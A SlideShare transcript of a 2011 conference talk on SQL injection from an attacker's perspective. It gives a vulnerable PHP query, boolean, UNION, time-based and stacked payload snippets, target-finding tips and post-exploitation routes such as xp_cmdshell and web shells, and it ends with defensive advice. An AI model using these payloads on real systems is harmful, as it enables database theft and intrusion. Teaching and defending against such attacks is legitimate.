SlideShare uma empresa Scribd logo

It all starts with the ' (SQL injection from attacker's point of view)

Miroslav Stampar
Miroslav Stampar

These are the slides from a talk "It all starts with the ' (SQL injection from attacker's point of view)" held at FSec 2011 conference (Croatia / Varazdin 22nd September 2011) by Miroslav Stampar

TecnologiaTurismo
1 de 25
Baixar para ler offline
It all starts with the ' (SQL injection from attacker's point of view) Miroslav Štampar (dev@sqlmap.org)
What is SQL injection? “SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of DBMS server for parsing and execution” (source: msdn.microsoft.com) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 2
What is SQL injection? (2)  In plain speak, SQL injection is (mostly) about the unauthorized DBMS data access  Just in special cases, it's about the data modification together with system takeover  “Hello World” vulnerable code example (PHP/MySQL):  $sql = "SELECT * FROM table_name WHERE id =  " . $_GET["id"];  $result = mysql_query($sql) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 3
Well known cases  In period 2005 till 2007 Albert Gonzalez has stolen 130 million credit card numbers  June 2007 – Microsoft U.K. Website defaced  December 2009 – RockYou (32 million credentials stolen)  December 2009 – NASA  July 2010 – The Pirate Bay FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 4
Well known cases (2)  February 2011 – HBGary (Anonymous)  March 2011 – MySQL  March & May 2011 – Comodo (certificate reseller)  June 2011 – Sony, PBS (@LulzSec)  August 2011 – Nokia  September 2011 – NetNames DNS records (Betfair, The Telegraph, The Register, The National Geographic, UPS, Vodafone...) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 5
Attackers' motivation number of vulnerable sites collected x  time spent on each site = const. time spent on particular target /  motivation = const. (target = multiple (co)sites) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 6
Attackers' profiles 1) Targeting easy targets, unfocused, fast pace, predictable behavior, blabbering, don't really care about the target (“script kiddies”) 2) Persistent, focused, slow motion, covert, silent, higher than average technical skills, highly motivated (money, extortion, fame) (“black hats”/“crackers”/”bad guys”) 3) For fun and knowledge, could warn you about the problem found, don't want to cause any damage (”gray hats”/”hackers”/”good guys”) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 7
SQL injection techniques  Boolean/Blind – AND 1=1, slow, 1 bit per request, page differentiation based, low difference ratio represents True response, False otherwise (in most common cases)  Error-based – CONVERT(INT,(<subquery>)), fast, 1 (sub)query result per request, based on inclusion of subquery result(s) inside DBMS error message  Union/Inband – UNION ALL SELECT NULL,...,  (<subquery>),NULL,NULL,..., fastest, in FULL variant whole table dump per request, in PARTIAL variant 1 query result per request FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 8
SQL injection techniques (2)  Time-based – AND 1=IF(2>1,  BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,1 12))),0), slowest, 1 bit per request, delay represents True response, False otherwise  Stacked – ;INSERT INTO users VALUES (10,  'test', 'testpass'), affecting mainly Microsoft SQL and PostgreSQL platforms, required for data modification, system access (e.g. xp_cmdshell), UDF injection, there are also time and error-based variants for data retrieval  Other (DNS exfiltration, “Lateral”, Second order attacks, etc.) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 9
Attacking phases  Most SQL injection attacks can be dissected into following phases: 1) Searching for a vulnerable parameter (aka. “Injection point”) 2) Fingerprinting backend DBMS (for usage of proper payloads – e.g. error-based) 3) Finding a fastest applicable technique (U>E>B>T=S) 4) Enumeration (retrieving data of interest – e.g. usernames and passwords) 5) Eventual post-exploatation (underlying OS access, data modification, web server takeover) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 10
Attacking workflow (1)  Finding a potential target – underground forums (e.g. antichat.ru), IRC channels, Google (e.g. dorks), domain scanning (e.g. nmap ­p 80), SHODAN (specialized Computer Search Engine), “drive-by” (e.g. proxying of all casual everyday traffic), “hit-list”, etc.  Manual web-browser based GET/POST parameter tampering with “poisonous” SQL characters (e.g. appending character ' to the end of the original parameter value) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 11
Attacking workflow (2)  In case of a contained DBMS error attacker immediately proceeds with the “proper” (DBMS dependent) error-based payloads   FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 12
Attacking workflow (3)  Otherwise, following step is the usage of common boolean based payloads (e.g. AND  1=1­­%20, OR 1=1­­%20, etc.)   FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 13
Attacking workflow (4)  Along the attacking line, proper SQL injection prefix/suffix combination has to be “guessed”  For example, different payloads are needed in cases: ”SELECT * WHERE id='.$_GET[“id”] and ”SELECT * WHERE id=('.$_GET[“id”]')”  Adds one more dimension to the problem (more combinations)  Most common prefixes are: <blank>, ', “, '), “)  Problem of suffix finding can be most often circumvented by the usage of generic comment form: ­­%20 FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 14
Attacking workflow (5)  In case that boolean/blind injection worked, there is a great possibility for union/inband  Brute-force search for proper column number  ORDER BY fast column number finding technique  Looking if it's a partial or full inband case  Finding usable (presented) column FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 15
Attacking workflow (6)  If everything fails attacker could proceed (high motivation required) with common time-based payloads and/or stacked queries  Most commonly, this happens in INSERT/UPDATE/DELETE SQL injection cases (and DBMS error messages are suppressed)  Common payloads are: AND  1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(97))),0), ;IF(2>1) WAITFOR DELAY '0:0:5', ;SELECT COUNT(*)  FROM GENERATE_SERIES(1,5000000), etc. FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 16
Attacking workflow (7)  Enumeration phase consists of retrieving (”stealing”) data of interest:  Database and table names  Table dumps (e.g. users, admin,...)  System stored usernames and password hashes  User privileges and roles  Highly DBMS dependent (system database and table names, common function names, etc.)  Usage of automated tools is highly preferable in boolean/blind and time-based techniques FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 17
Attacking workflow (8)  Eventual post-exploitation is highly bounded by the applicable SQL injection technique(s) and current user privileges  Best/worst case scenario is the availability of stacked technique along with the “admin” privileges  UDF injection (e.g. functions for OS command execution), web shell (e.g. union/inband MySQL INTO OUTFILE), Metasploit payload upload and execution (e.g. stacked Microsoft SQL xp_cmdshell()), etc. FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 18
Process automation 1) Web Application Assessment Proxy (optional) – BURP, WebScarab 2) Automatic SQL injection detection and exploitation tool – sqlmap, Havij, sqlninja 3) Second order exploitation framework – Metasploit (optional) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 19
Introducing sqlmap  “sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database server(s)”  Unofficially, sqlmap is AIO (All-In-One) SQL injection tool  Over 10,000 repository updates and/or checkouts on a monthly basis  Part of most popular security distributions: Backtrack, Backbox, Web Security Dojo, OWASP Web Testing,... FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 20
sqlmap capabilities  Fully supported backend DBMSes (and growing): MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB  Fully supported SQL injection techniques: Boolean/Blind, Error-based, Union/Inband (partial & full), Timed-based, Stacked  Enumeration of: database users, users' password hashes, users' privileges, users' roles, databases, tables and columns, etc. FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 21
sqlmap capabilities (2)  Automatic recognition and cracking of password hashes  Support for IDS/WAF evasion in form of “tampering” scripts  Web server file upload/download  Arbitrary OS command execution and retrieval of standard console output  Establishment of an out-of-band TCP/UDP connection between the attacker's machine and the database server (Metasploit, ICMPsh) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 22
Closing words (for attackers)  Learn SQL more than "well" – “SQL injection is 100% SQL. The rest is injection”  Setup (virtual) vulnerable environment entirely by yourself – for gaining better mindset and possessing LEGAL assessment testing machine  Mimic with comprehension what other “attackers” do – including automated tools (e.g. sqlmap)  Research defensive mechanisms – for advanced comprehension of the topic FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 23
Closing words (for defenders)  Use (only) prepared SQL statements (bullet- proof against SQL injection attacks)  Self-filtering procedures are prone to common “programmer's” mistakes (e.g. forgetting to hard type-cast the integer parameter value)  Turn-off error (DBMS) reports  Use least privileged run (non-admin “query” user)  Always expect worst scenario and setup accordingly (e.g. use GRANT/REVOKE mechanism accordingly) FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 24
Questions? FSec – FOI 2011, Varaždin (Croatia) September 23, 2011 25

Recomendados

Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!Bernardo Damele A. G.
 
sqlmap - why (not how) it works?
sqlmap - why (not how) it works?sqlmap - why (not how) it works?
sqlmap - why (not how) it works?Miroslav Stampar
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 
sqlmap - Under the Hood
sqlmap - Under the Hoodsqlmap - Under the Hood
sqlmap - Under the HoodMiroslav Stampar
 
Heuristic methods used in sqlmap
Heuristic methods used in sqlmapHeuristic methods used in sqlmap
Heuristic methods used in sqlmapMiroslav Stampar
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
[오픈소스컨설팅]Day #1 MySQL 엔진소개, 튜닝, 백업 및 복구, 업그레이드방법
[오픈소스컨설팅]Day #1 MySQL 엔진소개, 튜닝, 백업 및 복구, 업그레이드방법[오픈소스컨설팅]Day #1 MySQL 엔진소개, 튜닝, 백업 및 복구, 업그레이드방법
[오픈소스컨설팅]Day #1 MySQL 엔진소개, 튜닝, 백업 및 복구, 업그레이드방법Ji-Woong Choi
 

Recomendados

Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!Bernardo Damele A. G.
 
sqlmap - why (not how) it works?
sqlmap - why (not how) it works?sqlmap - why (not how) it works?
sqlmap - why (not how) it works?Miroslav Stampar
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 
sqlmap - Under the Hood
sqlmap - Under the Hoodsqlmap - Under the Hood
sqlmap - Under the HoodMiroslav Stampar
 
Heuristic methods used in sqlmap
Heuristic methods used in sqlmapHeuristic methods used in sqlmap
Heuristic methods used in sqlmapMiroslav Stampar
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
[오픈소스컨설팅]Day #1 MySQL 엔진소개, 튜닝, 백업 및 복구, 업그레이드방법
[오픈소스컨설팅]Day #1 MySQL 엔진소개, 튜닝, 백업 및 복구, 업그레이드방법[오픈소스컨설팅]Day #1 MySQL 엔진소개, 튜닝, 백업 및 복구, 업그레이드방법
[오픈소스컨설팅]Day #1 MySQL 엔진소개, 튜닝, 백업 및 복구, 업그레이드방법Ji-Woong Choi
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 
Performance Tuning And Optimization Microsoft SQL Database
Performance Tuning And Optimization Microsoft SQL DatabasePerformance Tuning And Optimization Microsoft SQL Database
Performance Tuning And Optimization Microsoft SQL DatabaseTung Nguyen Thanh
 
Sql Injection 0wning Enterprise
Sql Injection 0wning EnterpriseSql Injection 0wning Enterprise
Sql Injection 0wning Enterprisen|u - The Open Security Community
 
MySQL Server Backup, Restoration, And Disaster Recovery Planning Presentation
MySQL Server Backup, Restoration, And Disaster Recovery Planning PresentationMySQL Server Backup, Restoration, And Disaster Recovery Planning Presentation
MySQL Server Backup, Restoration, And Disaster Recovery Planning PresentationColin Charles
 
High Availability PostgreSQL with Zalando Patroni
High Availability PostgreSQL with Zalando PatroniHigh Availability PostgreSQL with Zalando Patroni
High Availability PostgreSQL with Zalando PatroniZalando Technology
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
Postgresql tutorial
Postgresql tutorialPostgresql tutorial
Postgresql tutorialAshoka Vanjare
 
Wars of MySQL Cluster ( InnoDB Cluster VS Galera )
Wars of MySQL Cluster ( InnoDB Cluster VS Galera ) Wars of MySQL Cluster ( InnoDB Cluster VS Galera )
Wars of MySQL Cluster ( InnoDB Cluster VS Galera ) Mydbops
 
Oracle Data Redaction
Oracle Data RedactionOracle Data Redaction
Oracle Data RedactionAlex Zaballa
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
Row-level security and Dynamic Data Masking
Row-level security and Dynamic Data MaskingRow-level security and Dynamic Data Masking
Row-level security and Dynamic Data MaskingSolidQ
 
Aruba Instant 6.4.0.2-4.1 Command Line Interface Reference Guide
Aruba Instant 6.4.0.2-4.1 Command Line Interface Reference GuideAruba Instant 6.4.0.2-4.1 Command Line Interface Reference Guide
Aruba Instant 6.4.0.2-4.1 Command Line Interface Reference GuideAruba, a Hewlett Packard Enterprise company
 
MySQL GTID 시작하기
MySQL GTID 시작하기MySQL GTID 시작하기
MySQL GTID 시작하기I Goo Lee
 
MySQL 상태 메시지 분석 및 활용
MySQL 상태 메시지 분석 및 활용MySQL 상태 메시지 분석 및 활용
MySQL 상태 메시지 분석 및 활용I Goo Lee
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the databaseBernardo Damele A. G.
 
MySQL_SQL_Tunning_v0.1.3.docx
MySQL_SQL_Tunning_v0.1.3.docxMySQL_SQL_Tunning_v0.1.3.docx
MySQL_SQL_Tunning_v0.1.3.docxNeoClova
 
Ossec Lightning
Ossec LightningOssec Lightning
Ossec Lightningwremes
 
XDP in Practice: DDoS Mitigation @Cloudflare
XDP in Practice: DDoS Mitigation @CloudflareXDP in Practice: DDoS Mitigation @Cloudflare
XDP in Practice: DDoS Mitigation @CloudflareC4Media
 
Oracle Client Failover - Under The Hood
Oracle Client Failover - Under The HoodOracle Client Failover - Under The Hood
Oracle Client Failover - Under The HoodLudovico Caldara
 
Smashing the Buffer
Smashing the BufferSmashing the Buffer
Smashing the BufferMiroslav Stampar
 
Curious Case of SQLi
Curious Case of SQLiCurious Case of SQLi
Curious Case of SQLiMiroslav Stampar
 

Mais conteúdo relacionado

Mais procurados

Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 
Performance Tuning And Optimization Microsoft SQL Database
Performance Tuning And Optimization Microsoft SQL DatabasePerformance Tuning And Optimization Microsoft SQL Database
Performance Tuning And Optimization Microsoft SQL DatabaseTung Nguyen Thanh
 
MySQL Server Backup, Restoration, And Disaster Recovery Planning Presentation
MySQL Server Backup, Restoration, And Disaster Recovery Planning PresentationMySQL Server Backup, Restoration, And Disaster Recovery Planning Presentation
MySQL Server Backup, Restoration, And Disaster Recovery Planning PresentationColin Charles
 
High Availability PostgreSQL with Zalando Patroni
High Availability PostgreSQL with Zalando PatroniHigh Availability PostgreSQL with Zalando Patroni
High Availability PostgreSQL with Zalando PatroniZalando Technology
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
Wars of MySQL Cluster ( InnoDB Cluster VS Galera )
Wars of MySQL Cluster ( InnoDB Cluster VS Galera ) Wars of MySQL Cluster ( InnoDB Cluster VS Galera )
Wars of MySQL Cluster ( InnoDB Cluster VS Galera ) Mydbops
 
Oracle Data Redaction
Oracle Data RedactionOracle Data Redaction
Oracle Data RedactionAlex Zaballa
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
Row-level security and Dynamic Data Masking
Row-level security and Dynamic Data MaskingRow-level security and Dynamic Data Masking
Row-level security and Dynamic Data MaskingSolidQ
 
MySQL GTID 시작하기
MySQL GTID 시작하기MySQL GTID 시작하기
MySQL GTID 시작하기I Goo Lee
 
MySQL 상태 메시지 분석 및 활용
MySQL 상태 메시지 분석 및 활용MySQL 상태 메시지 분석 및 활용
MySQL 상태 메시지 분석 및 활용I Goo Lee
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the databaseBernardo Damele A. G.
 
MySQL_SQL_Tunning_v0.1.3.docx
MySQL_SQL_Tunning_v0.1.3.docxMySQL_SQL_Tunning_v0.1.3.docx
MySQL_SQL_Tunning_v0.1.3.docxNeoClova
 
Ossec Lightning
Ossec LightningOssec Lightning
Ossec Lightningwremes
 
XDP in Practice: DDoS Mitigation @Cloudflare
XDP in Practice: DDoS Mitigation @CloudflareXDP in Practice: DDoS Mitigation @Cloudflare
XDP in Practice: DDoS Mitigation @CloudflareC4Media
 
Oracle Client Failover - Under The Hood
Oracle Client Failover - Under The HoodOracle Client Failover - Under The Hood
Oracle Client Failover - Under The HoodLudovico Caldara
 

Mais procurados (20)

Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmap
 
Performance Tuning And Optimization Microsoft SQL Database
Performance Tuning And Optimization Microsoft SQL DatabasePerformance Tuning And Optimization Microsoft SQL Database
Performance Tuning And Optimization Microsoft SQL Database
 
Sql Injection 0wning Enterprise
Sql Injection 0wning EnterpriseSql Injection 0wning Enterprise
Sql Injection 0wning Enterprise
 
MySQL Server Backup, Restoration, And Disaster Recovery Planning Presentation
MySQL Server Backup, Restoration, And Disaster Recovery Planning PresentationMySQL Server Backup, Restoration, And Disaster Recovery Planning Presentation
MySQL Server Backup, Restoration, And Disaster Recovery Planning Presentation
 
High Availability PostgreSQL with Zalando Patroni
High Availability PostgreSQL with Zalando PatroniHigh Availability PostgreSQL with Zalando Patroni
High Availability PostgreSQL with Zalando Patroni
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads Up
 
Postgresql tutorial
Postgresql tutorialPostgresql tutorial
Postgresql tutorial
 
Wars of MySQL Cluster ( InnoDB Cluster VS Galera )
Wars of MySQL Cluster ( InnoDB Cluster VS Galera ) Wars of MySQL Cluster ( InnoDB Cluster VS Galera )
Wars of MySQL Cluster ( InnoDB Cluster VS Galera )
 
Oracle Data Redaction
Oracle Data RedactionOracle Data Redaction
Oracle Data Redaction
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmap
 
Row-level security and Dynamic Data Masking
Row-level security and Dynamic Data MaskingRow-level security and Dynamic Data Masking
Row-level security and Dynamic Data Masking
 
Aruba Instant 6.4.0.2-4.1 Command Line Interface Reference Guide
Aruba Instant 6.4.0.2-4.1 Command Line Interface Reference GuideAruba Instant 6.4.0.2-4.1 Command Line Interface Reference Guide
Aruba Instant 6.4.0.2-4.1 Command Line Interface Reference Guide
 
MySQL GTID 시작하기
MySQL GTID 시작하기MySQL GTID 시작하기
MySQL GTID 시작하기
 
MySQL 상태 메시지 분석 및 활용
MySQL 상태 메시지 분석 및 활용MySQL 상태 메시지 분석 및 활용
MySQL 상태 메시지 분석 및 활용
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the database
 
MySQL_SQL_Tunning_v0.1.3.docx
MySQL_SQL_Tunning_v0.1.3.docxMySQL_SQL_Tunning_v0.1.3.docx
MySQL_SQL_Tunning_v0.1.3.docx
 
Ossec Lightning
Ossec LightningOssec Lightning
Ossec Lightning
 
XDP in Practice: DDoS Mitigation @Cloudflare
XDP in Practice: DDoS Mitigation @CloudflareXDP in Practice: DDoS Mitigation @Cloudflare
XDP in Practice: DDoS Mitigation @Cloudflare
 
Oracle Client Failover - Under The Hood
Oracle Client Failover - Under The HoodOracle Client Failover - Under The Hood
Oracle Client Failover - Under The Hood
 

Destaque

Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 
2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)Miroslav Stampar
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacksMiroslav Stampar
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksMiroslav Stampar
 
Spot the Web Vulnerability
Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web VulnerabilityMiroslav Stampar
 
Advanced SQL Injection Attack & Defenses
Advanced SQL Injection Attack & DefensesAdvanced SQL Injection Attack & Defenses
Advanced SQL Injection Attack & DefensesTiago Mendo
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and NowMiroslav Stampar
 
MySQL Connector/J における SQL インジェクションの脆弱性
MySQL Connector/J における SQL インジェクションの脆弱性MySQL Connector/J における SQL インジェクションの脆弱性
MySQL Connector/J における SQL インジェクションの脆弱性JPCERT Coordination Center
 
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性JPCERT Coordination Center
 
Apache Tomcat における クロスサイトリクエストフォージェリ (CSRF) 保護メカニズム回避の脆弱性
Apache Tomcat における クロスサイトリクエストフォージェリ (CSRF) 保護メカニズム回避の脆弱性Apache Tomcat における クロスサイトリクエストフォージェリ (CSRF) 保護メカニズム回避の脆弱性
Apache Tomcat における クロスサイトリクエストフォージェリ (CSRF) 保護メカニズム回避の脆弱性JPCERT Coordination Center
 
Blojsom におけるクロスサイトスクリプティングの脆弱性
Blojsom におけるクロスサイトスクリプティングの脆弱性Blojsom におけるクロスサイトスクリプティングの脆弱性
Blojsom におけるクロスサイトスクリプティングの脆弱性JPCERT Coordination Center
 
SQL injection exploitation internals
SQL injection exploitation internalsSQL injection exploitation internals
SQL injection exploitation internalsBernardo Damele A. G.
 
Psychological science and beliefs
Psychological science and beliefsPsychological science and beliefs
Psychological science and beliefsLance Jones
 
Pelancaran bulan kecergasan 6 Julai 2013
Pelancaran bulan kecergasan 6 Julai 2013Pelancaran bulan kecergasan 6 Julai 2013
Pelancaran bulan kecergasan 6 Julai 2013Laila Mustafa
 
CHS Reunion Slide Show 2001
CHS Reunion Slide Show 2001CHS Reunion Slide Show 2001
CHS Reunion Slide Show 2001kbexter
 
Pertandingan kawad kaki peringkat daerah seremban 1
Pertandingan kawad kaki peringkat daerah seremban 1Pertandingan kawad kaki peringkat daerah seremban 1
Pertandingan kawad kaki peringkat daerah seremban 1Laila Mustafa
 

Destaque (20)

Smashing the Buffer
Smashing the BufferSmashing the Buffer
Smashing the Buffer
 
Curious Case of SQLi
Curious Case of SQLiCurious Case of SQLi
Curious Case of SQLi
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and Now
 
2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)2014 – Year of Broken Name Generator(s)
2014 – Year of Broken Name Generator(s)
 
Hash DoS Attack
Hash DoS AttackHash DoS Attack
Hash DoS Attack
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
 
Data Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection AttacksData Retrieval over DNS in SQL Injection Attacks
Data Retrieval over DNS in SQL Injection Attacks
 
Spot the Web Vulnerability
Spot the Web VulnerabilitySpot the Web Vulnerability
Spot the Web Vulnerability
 
Advanced SQL Injection Attack & Defenses
Advanced SQL Injection Attack & DefensesAdvanced SQL Injection Attack & Defenses
Advanced SQL Injection Attack & Defenses
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injection
 
Riding the Overflow - Then and Now
Riding the Overflow - Then and NowRiding the Overflow - Then and Now
Riding the Overflow - Then and Now
 
MySQL Connector/J における SQL インジェクションの脆弱性
MySQL Connector/J における SQL インジェクションの脆弱性MySQL Connector/J における SQL インジェクションの脆弱性
MySQL Connector/J における SQL インジェクションの脆弱性
 
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性
Spacewalkにおけるクロスサイト リクエストフォージェリ(CSRF)の脆弱性
 
Apache Tomcat における クロスサイトリクエストフォージェリ (CSRF) 保護メカニズム回避の脆弱性
Apache Tomcat における クロスサイトリクエストフォージェリ (CSRF) 保護メカニズム回避の脆弱性Apache Tomcat における クロスサイトリクエストフォージェリ (CSRF) 保護メカニズム回避の脆弱性
Apache Tomcat における クロスサイトリクエストフォージェリ (CSRF) 保護メカニズム回避の脆弱性
 
Blojsom におけるクロスサイトスクリプティングの脆弱性
Blojsom におけるクロスサイトスクリプティングの脆弱性Blojsom におけるクロスサイトスクリプティングの脆弱性
Blojsom におけるクロスサイトスクリプティングの脆弱性
 
SQL injection exploitation internals
SQL injection exploitation internalsSQL injection exploitation internals
SQL injection exploitation internals
 
Psychological science and beliefs
Psychological science and beliefsPsychological science and beliefs
Psychological science and beliefs
 
Pelancaran bulan kecergasan 6 Julai 2013
Pelancaran bulan kecergasan 6 Julai 2013Pelancaran bulan kecergasan 6 Julai 2013
Pelancaran bulan kecergasan 6 Julai 2013
 
CHS Reunion Slide Show 2001
CHS Reunion Slide Show 2001CHS Reunion Slide Show 2001
CHS Reunion Slide Show 2001
 
Pertandingan kawad kaki peringkat daerah seremban 1
Pertandingan kawad kaki peringkat daerah seremban 1Pertandingan kawad kaki peringkat daerah seremban 1
Pertandingan kawad kaki peringkat daerah seremban 1
 

Semelhante a It all starts with the ' (SQL injection from attacker's point of view)

Scalable Web Solutions - Use Case: Regulatory Reform In Vietnam On eZ Publish...
Scalable Web Solutions - Use Case: Regulatory Reform In Vietnam On eZ Publish...Scalable Web Solutions - Use Case: Regulatory Reform In Vietnam On eZ Publish...
Scalable Web Solutions - Use Case: Regulatory Reform In Vietnam On eZ Publish...Ivo Lukač
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngDmitry Evteev
 
Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Rod Soto
 
4MMSR-3 web vulnerabilities-lecturer
4MMSR-3 web vulnerabilities-lecturer4MMSR-3 web vulnerabilities-lecturer
4MMSR-3 web vulnerabilities-lecturerFabi0_Alejandr0
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesMarco Morana
 
Top Security Threats for .NET Developers
Top Security Threats for .NET DevelopersTop Security Threats for .NET Developers
Top Security Threats for .NET DevelopersMikhail Shcherbakov
 
zkStudyClub: Zero-Knowledge Proofs Security, in Practice [JP Aumasson, Taurus]
zkStudyClub: Zero-Knowledge Proofs Security, in Practice [JP Aumasson, Taurus]zkStudyClub: Zero-Knowledge Proofs Security, in Practice [JP Aumasson, Taurus]
zkStudyClub: Zero-Knowledge Proofs Security, in Practice [JP Aumasson, Taurus]Alex Pruden
 
Sql injection manish file
Sql injection manish fileSql injection manish file
Sql injection manish fileyukta888
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 
SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines José Ignacio
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
QA Automation Extended Star
QA Automation Extended StarQA Automation Extended Star
QA Automation Extended StarPrice Charlot
 
6.Resource Exhaustion
6.Resource Exhaustion6.Resource Exhaustion
6.Resource Exhaustionphanleson
 
Network Security Data Visualization
Network Security Data VisualizationNetwork Security Data Visualization
